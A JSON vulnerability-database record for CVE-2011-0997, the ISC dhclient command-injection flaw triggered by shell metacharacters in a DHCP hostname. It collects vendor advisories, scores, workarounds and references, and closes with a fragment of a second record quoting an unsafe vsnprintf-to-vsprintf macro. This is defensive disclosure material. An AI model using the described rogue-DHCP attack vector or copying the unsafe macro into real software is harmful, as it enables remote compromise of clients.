"id": "CVE-2011-0997"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:airport_base_station_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:time_capsule",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
}
]
},
"credits": {
"_id": null,
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "100273"
},
{
"db": "PACKETSTORM",
"id": "100274"
}
],
"trust": 0.2
},
"cve": "CVE-2011-0997",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2011-0997",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-0997",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#107886",
"trust": 0.8,
"value": "11.34"
},
{
"author": "NVD",
"id": "CVE-2011-0997",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201104-043",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2011-0997",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#107886"
},
{
"db": "VULMON",
"id": "CVE-2011-0997"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "NVD",
"id": "CVE-2011-0997"
}
]
},
"description": {
"_id": null,
"data": "dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message, as demonstrated by a hostname that is provided to dhclient-script. The ISC dhclient contains a vulnerability that could allow a remote attacker to execute arbitrary code on the client machine. Apple From Apple Time Capsule and AirPort Base Station (802.11n) Firmware update for has been released.Crafted DHCP Any command may be executed by processing the response. Depending on the script and OS, this can result in execution of exploit code on the client. \n\nCVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C)\n\nFor more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator\u0026adv\u0026version=2 \n\nWorkarounds: \n\nOn SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME=\"no\" in /etc/sysconfig/network/dhcp. \n\nOther systems may add following line to dhclient-script at the beginning of the set_hostname() function:\n\nnew_host_name=${new_host_name//[^-.a-zA-Z0-9]/}\n\nIn environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers. \n\n\nActive exploits: \n\nNone known at this time. https://www.isc.org/downloads/all\n\nNo patch is available for 4.0.x as it is EOL. Anyone running 4.1.x should upgrade to 4.1-ESV-R2. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2216-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nApril 10, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : isc-dhcp\nVulnerability : missing input sanitization\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0997\nDebian bug : 621099\n\nSebastian Krahmer and Marius Tomaschewski discovered that dhclient of\nisc-dhcp, a DHCP client, is not properly filtering shell meta-characters\nin certain options in DHCP server responses. These options are reused in\nan insecure fashion by dhclient scripts. \n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nadditional update for dhcp3. \n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze2. \n\nFor the testing distribution (wheezy), this problem will be fixed soon. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.1.1-P1-16.1. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (GNU/Linux)\n\niEYEARECAAYFAk2iJ1AACgkQHYflSXNkfP8fEwCglH3YEMa8hlo7ChGFlvT7K9v5\nBMcAoIuGqJofENG1o5SiXU1/E9qEF/Am\n=5Q/C\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201301-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: ISC DHCP: Denial of Service\n Date: January 09, 2013\n Bugs: #362453, #378799, #393617, #398763, #428120, #434880\n ID: 201301-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in ISC DHCP, the worst of\nwhich may allow remote Denial of Service. \n\nBackground\n==========\n\nISC DHCP is a Dynamic Host Configuration Protocol (DHCP) client/server. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/dhcp \u003c 4.2.4_p2 \u003e= 4.2.4_p2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in ISC DHCP. Please\nreview the CVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll ISC DHCP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/dhcp-4.2.4_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-0997\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997\n[ 2 ] CVE-2011-2748\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748\n[ 3 ] CVE-2011-2749\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749\n[ 4 ] CVE-2011-4539\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539\n[ 5 ] CVE-2011-4868\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868\n[ 6 ] CVE-2012-3570\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570\n[ 7 ] CVE-2012-3571\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571\n[ 8 ] CVE-2012-3954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954\n[ 9 ] CVE-2012-3955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201301-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2013 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. This issue is addressed by stripping shell meta-characters\nin dhclient-script. \n\nIt is recommended that AirPort Utility 5.5.3 or later be installed\nbefore upgrading to Firmware version 7.6. ----------------------------------------------------------------------\n\n\nQ1 Factsheets released:\n\nhttp://secunia.com/resources/factsheets/2011_vendor/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nISC DHCP \"dhclient\" Response Processing Input Sanitation\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA44037\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44037/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037\n\nRELEASE DATE:\n2011-04-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44037/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44037/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in ISC DHCP, which can be exploited\nby malicious people to compromise a vulnerable system. \n\nThe vulnerability is caused due to certain shell meta-characters not\nbeing stripped or escaped when processing responses from a DHCP\nserver. This can be exploited to submit shell commands to the\n\"dhclient-script\" script via e.g. a specially crafted \"hostname\"\nresponse. \n\nThe vulnerability is reported in versions 3.0.x through 4.2.x. \n\nSOLUTION:\nUpdate to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE\nSecurity Team. \n\nORIGINAL ADVISORY:\nhttps://www.isc.org/software/dhcp/advisories/cve-2011-0997\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-0997"
},
{
"db": "CERT/CC",
"id": "VU#107886"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "VULMON",
"id": "CVE-2011-0997"
},
{
"db": "PACKETSTORM",
"id": "100160"
},
{
"db": "PACKETSTORM",
"id": "100273"
},
{
"db": "PACKETSTORM",
"id": "119354"
},
{
"db": "PACKETSTORM",
"id": "106987"
},
{
"db": "PACKETSTORM",
"id": "100274"
},
{
"db": "PACKETSTORM",
"id": "100149"
}
],
"trust": 2.97
},
"external_ids": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#107886",
"trust": 3.3
},
{
"db": "NVD",
"id": "CVE-2011-0997",
"trust": 3.1
},
{
"db": "SECUNIA",
"id": "44037",
"trust": 1.9
},
{
"db": "VUPEN",
"id": "ADV-2011-1000",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0909",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0915",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0926",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0965",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0879",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2011-0886",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44103",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44127",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44048",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44180",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44089",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "44090",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1025300",
"trust": 1.7
},
{
"db": "JUNIPER",
"id": "JSA10761",
"trust": 1.7
},
{
"db": "BID",
"id": "47176",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "71493",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "37623",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2011-0997",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100160",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100273",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119354",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "106987",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "100149",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#107886"
},
{
"db": "VULMON",
"id": "CVE-2011-0997"
},
{
"db": "PACKETSTORM",
"id": "100160"
},
{
"db": "PACKETSTORM",
"id": "100273"
},
{
"db": "PACKETSTORM",
"id": "119354"
},
{
"db": "PACKETSTORM",
"id": "106987"
},
{
"db": "PACKETSTORM",
"id": "100274"
},
{
"db": "PACKETSTORM",
"id": "100149"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "NVD",
"id": "CVE-2011-0997"
}
]
},
"id": "VAR-201104-0082",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.413494225
},
"last_update_date": "2026-03-09T22:43:44.086000Z",
"patch": {
"_id": null,
"data": [
{
"title": "HT5005",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT5005"
},
{
"title": "ISC DHCP dhclient Response processing shell Measures to fix meta-character code execution vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113225"
},
{
"title": "Debian CVElist Bug Report Logs: isc-dhcp-client: CVE-2011-0997",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=a3bf1099a3f6410da5cb17491cb28710"
},
{
"title": "Ubuntu Security Notice: dhcp3 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1108-2"
},
{
"title": "Ubuntu Security Notice: dhcp3 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-1108-1"
},
{
"title": "Debian Security Advisories: DSA-2216-1 isc-dhcp -- missing input sanitization",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9079594e67dfba2ce5fd90c652ce64af"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2011-2716 udhcpc insufficient checking of DHCP options",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d937c5addcd54815f7f0480b4b3a55e2"
},
{
"title": "VMware Security Advisories: VMware ESX third party updates for Service Console packages glibc and dhcp",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=386db0c9014e75eeed9029418ea6714f"
},
{
"title": "Citrix Security Bulletins: Archive: Citrix XenServer Multiple Security Updates",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=30a988053a9b9c888e66371d7b3040f2"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/critical-rce-bug-avaya-voip-phones/147122/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/avaya-voip-phones-harbored-10-year-old-vulnerability/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2011-0997"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "NVD",
"id": "CVE-2011-0997"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "http://www.kb.cert.org/vuls/id/107886"
},
{
"trust": 1.8,
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"trust": 1.8,
"url": "https://www.isc.org/software/dhcp/advisories/cve-2011-0997"
},
{
"trust": 1.7,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10761"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/057888.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-april/058279.html"
},
{
"trust": 1.7,
"url": "http://marc.info/?l=bugtraq\u0026m=133226187115472\u0026w=2"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44037"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44048"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44089"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44090"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44103"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44127"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/44180"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1025300"
},
{
"trust": 1.7,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2011\u0026m=slackware-security.593345"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2011/dsa-2216"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2011/dsa-2217"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2011:073"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/71493"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2011-0428.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2011-0840.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/47176"
},
{
"trust": 1.7,
"url": "http://www.ubuntu.com/usn/usn-1108-1"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0879"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0886"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0909"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0915"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0926"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0965"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/1000"
},
{
"trust": 1.7,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=689832"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66580"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a12812"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/37623/"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0997"
},
{
"trust": 0.8,
"url": "https://jvn.jp/cert/jvnvu107886/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/cert/jvnvu309451/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0997"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-0997"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.2,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=621099"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/linuxrpm-rhsa-2011-0428"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/1108-2/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.isc.org/downloads/all"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/cvss.cfm?calculator\u0026adv\u0026version=2"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2748"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0997"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3955"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3571"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3954"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-4539"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3570"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-4868"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3954"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4539"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2749"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2749"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3570"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3955"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3571"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2748"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4868"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "http://www.apple.com/support/downloads/"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1222"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44037"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44037/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/44037/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/resources/factsheets/2011_vendor/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#107886"
},
{
"db": "VULMON",
"id": "CVE-2011-0997"
},
{
"db": "PACKETSTORM",
"id": "100160"
},
{
"db": "PACKETSTORM",
"id": "100273"
},
{
"db": "PACKETSTORM",
"id": "119354"
},
{
"db": "PACKETSTORM",
"id": "106987"
},
{
"db": "PACKETSTORM",
"id": "100274"
},
{
"db": "PACKETSTORM",
"id": "100149"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066"
},
{
"db": "NVD",
"id": "CVE-2011-0997"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CERT/CC",
"id": "VU#107886",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2011-0997",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "100160",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "100273",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "119354",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "106987",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "100274",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "100149",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003066",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2011-0997",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2011-04-05T00:00:00",
"db": "CERT/CC",
"id": "VU#107886",
"ident": null
},
{
"date": "2011-04-08T00:00:00",
"db": "VULMON",
"id": "CVE-2011-0997",
"ident": null
},
{
"date": "2011-04-07T15:19:36",
"db": "PACKETSTORM",
"id": "100160",
"ident": null
},
{
"date": "2011-04-11T14:45:39",
"db": "PACKETSTORM",
"id": "100273",
"ident": null
},
{
"date": "2013-01-09T02:26:37",
"db": "PACKETSTORM",
"id": "119354",
"ident": null
},
{
"date": "2011-11-15T05:14:36",
"db": "PACKETSTORM",
"id": "106987",
"ident": null
},
{
"date": "2011-04-11T14:46:07",
"db": "PACKETSTORM",
"id": "100274",
"ident": null
},
{
"date": "2011-04-06T08:45:32",
"db": "PACKETSTORM",
"id": "100149",
"ident": null
},
{
"date": "2011-04-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201104-043",
"ident": null
},
{
"date": "2011-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003066",
"ident": null
},
{
"date": "2011-04-08T15:17:27.387000",
"db": "NVD",
"id": "CVE-2011-0997",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2011-05-06T00:00:00",
"db": "CERT/CC",
"id": "VU#107886",
"ident": null
},
{
"date": "2020-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2011-0997",
"ident": null
},
{
"date": "2020-04-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201104-043",
"ident": null
},
{
"date": "2011-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003066",
"ident": null
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-0997",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "100160"
},
{
"db": "PACKETSTORM",
"id": "119354"
},
{
"db": "PACKETSTORM",
"id": "106987"
},
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
}
],
"trust": 0.9
},
"title": {
"_id": null,
"data": "ISC dhclient vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#107886"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201104-043"
}
],
"trust": 0.6
}
}
VAR-200408-0175
Vulnerability from variot - Updated: 2025-04-03 22:09The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium's (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. On systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:
define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)
